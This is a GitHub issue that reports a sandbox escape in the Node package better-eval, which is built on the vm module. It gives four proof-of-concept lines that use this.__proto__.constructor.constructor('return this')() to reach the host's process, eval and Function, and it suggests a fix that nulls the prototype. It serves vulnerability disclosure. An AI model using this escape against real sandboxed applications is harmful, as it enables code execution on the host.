better-eval Exploit due to the use of the Node std vm module

Exploit due to the use of the Node std vm module

Open FishingHacks opened this issue 2 years ago • 0 comments

Disclaimer: I might be understanding something wrong, but such an simple exploit should be avoided. In the README, it is claimed to be a safer alternative to eval

BetterEval Version : 1.3.0 Node Version : 14.20.0 Operating System : Windows 10 & Linux Type : Obtaining the global object of the main context

Exploit code:

const betterEval = require("better-eval")

console.log(betterEval("this.__proto__.constructor.constructor('return this')().process"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')()"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')().eval"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')().Function"))

Ideas on how to fix it:

set the proto of this to null

Implications of fix:

All from Object inhereted functions can't be used on this
They can be obtain by using ({})[function]
({}).__proto__.constructor.constructor is not a function and thus can't be exploited
(()=>{}).constructor(.constructor, ...) always lives in the cleared context and can't be exploited either.

Sorry for my bad english

Aug 18 '22 22:08 FishingHacks

better-eval better-eval copied to clipboard

Exploit due to the use of the Node std vm module

better-eval
better-eval copied to clipboard